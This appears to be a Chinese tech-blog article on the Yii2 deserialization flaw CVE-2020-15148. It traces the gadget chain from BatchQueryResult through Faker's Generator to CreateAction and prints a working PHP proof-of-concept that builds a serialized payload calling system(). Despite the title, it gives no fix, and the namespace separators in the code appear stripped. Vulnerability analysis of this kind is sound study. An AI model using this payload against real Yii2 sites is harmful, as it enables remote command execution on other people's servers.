CVE-2020-15148漏洞怎么解决

2023-05-20

今天小编给大家分享一下CVE-2020-15148漏洞怎么解决的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。

    Yii2

    Yii是一个基于组件的高性能PHP框架,用于开发大型Web应用。Yii采用严格的OOP编写,并有着完善的库引用以及全面的教程。而CVE-2020-15148则是在其版本YII2.0.38之前的一个反序列化漏洞,该漏洞在调用unserialize时,攻击者可通过构造特定的恶意请求执行任意命令,这也是常见的反序列化漏洞的利用过程。

    魔术方法

    提到PHP反序列化一定离不开魔术方法,这些方法通常会在达到一些特殊条件后就会执行,举个例子:

    __construct() //新建对象时调用

    我们编写下面的代码:

    当我们执行时new了一个类,这就会调用里面的魔术方法,从而输出语句。当然这只是最简单的魔术方法,下面给大家一个列表来进行参考:

    了解完以上知识点后我们开始对该漏洞进行分析。

    漏洞分析

    首先我们要搭建环境,最好搭建在本地方便调试,源码地址如下:

    github.com/yiisoft/yii…

    搭建完后我们首先找到漏洞切入点,也就是可能存在威胁的地方,结合上面对魔术方法的分析在 /vendor/yiisoft/yii2/db/BatchQueryResult.php下找到了可能存在漏洞的点,因为里面有个魔术方法在对象销毁时调用:

    __destruct()调用了reset()方法,方法里面的$this->_dataReader是可控的:

    public function reset()
    {
            if ($this->_dataReader !== null) {
                $this->_dataReader->close();
            }

    于是思考接下来要如何利用,根据POC的构造,假设我们将_dataReader变成类然后去调用close()方法,若类型没有close()方法,同时还有__call魔术方法,则会调用该魔术方法。我们找到faker/src/Faker/Generator.php:里面存在call方法且调用了foemat方法:

    public function format($formatter, $arguments = array())
        {
            return call_user_func_array($this->getFormatter($formatter), $arguments);
        }

    跟进这里:

    $this->getFormatter($formatter)

    看到存在可控参数:

    public function getFormatter($formatter)
    {
            if (isset($this->formatters[$formatter])) { 
                return $this->formatters[$formatter];
            }
            foreach ($this->providers as $provider) {
                if (method_exists($provider, $formatter)) {
                    $this->formatters[$formatter] = array($provider, $formatter);
                    return $this->formatters[$formatter];
                }
            }

    this−>formatters[this - > formatters[this−>formatters[formatter] 有值,就返回其值,回看一下会发现值为:

    $formatter='close',$arguments=空

    即返回的第一个参数是可控的,我们便可以调用任意的无参方法,这里找到/vendor/yiisoft/yii2/rest/CreateAction.php:

     public function run()
        {
            if ($this->checkAccess) {
                call_user_func($this->checkAccess, $this->id);
            }

    this−>checkAccess,this->checkAccess,this−>checkAccess,this->id是可控的,那么就可以执行RCE。利用链如下:

    yii\db\BatchQueryResult::__destruct()->Faker\Generator::__call()->yii\rest\CreateAction::run()

    这里贴一个大佬们的POC:

    <?php
    namespace yiirest{
        class CreateAction{
            public $checkAccess;
            public $id;
            public function __construct(){
                $this->checkAccess = 'system';
                $this->id = 'phpinfo();';
            }
        }
    }
    namespace Faker{
        use yiirestCreateAction;
        class Generator{
            protected $formatters;
            public function __construct(){
                $this->formatters['close'] = [new CreateAction, 'run'];
            }
        }
    }
    namespace yiidb{
        use FakerGenerator;
        class BatchQueryResult{
            private $_dataReader;
            public function __construct(){
                $this->_dataReader = new Generator;
            }
        }
    }
    namespace{
        echo base64_encode(serialize(new yiidbBatchQueryResult));
    }
    ?>

    下面是传入构造好的payload对网站进行请求的结果,可以看到成功进行了命令执行。

    以上就是“CVE-2020-15148漏洞怎么解决”这篇文章的所有内容,感谢各位的阅读!相信大家阅读完这篇文章都有很大的收获,小编每天都会为大家更新不同的知识,如果还想学习更多的知识,请关注本站行业资讯频道。

    《CVE-2020-15148漏洞怎么解决.doc》

    下载本文的Word格式文档,以方便收藏与打印。